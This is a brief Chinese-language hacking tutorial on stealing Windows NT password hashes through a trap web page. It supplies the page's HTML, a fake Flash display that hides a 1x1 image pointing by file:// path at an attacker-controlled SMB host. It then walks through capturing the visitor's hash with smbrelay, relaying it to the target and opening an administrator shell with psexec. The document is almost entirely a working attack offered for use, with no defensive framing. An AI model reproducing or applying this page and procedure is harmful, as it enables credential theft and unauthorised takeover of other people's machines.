利用网页截取得NT密码散列直接入侵

本机ip: 192.168.0.5

肉鸡ip: 192.168.0.3

陷阱页面代码：

<html><head> <title>Flash</title> <table border=0 width=100% height=460> <tr> <td width=100% bgcolor=#FFFFFF height=395> <p align=center> <OBJECT classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://active.macromedia.com/flash2/cabs/swflash.cab#version=4,0 ,0,0 WIDTH=546 HEIGHT=372> <PARAM NAME=movie VALUE=111.SWF> <PARAM NAME=quality VALUE=high> <embed src=111.SWF loop=false menu=false quality=high WIDTH=400 HEIGHT=300 TYPE=application/x-shockwave-flash PLUGINSPAGE=http://www.macromedia.com/shockwave/download/index.cgi?P1_Pro d_Version=ShockwaveFlash> </OBJECT></p></td></tr> <tr><img src="file://192.168.0.2/A.JPG" height=1 width=1 > <td width=100% bgcolor=#FFFF9C height=48> </td></tr></table><head></html>

陷阱页面关键句子

<img src="file://192.168.0.2/A.JPG" height=1 width=1 >

现在使用smbrelay.exe绑定ip 192.168.0.2

从肉鸡上访问本机页面

ok!! smbrelay抓到散列!

现在通过192.168.0.2与目标建立连接

用psexec.exe来得到一个shell

ok!!来看看权限！

很好！超级用户！这样就创建了！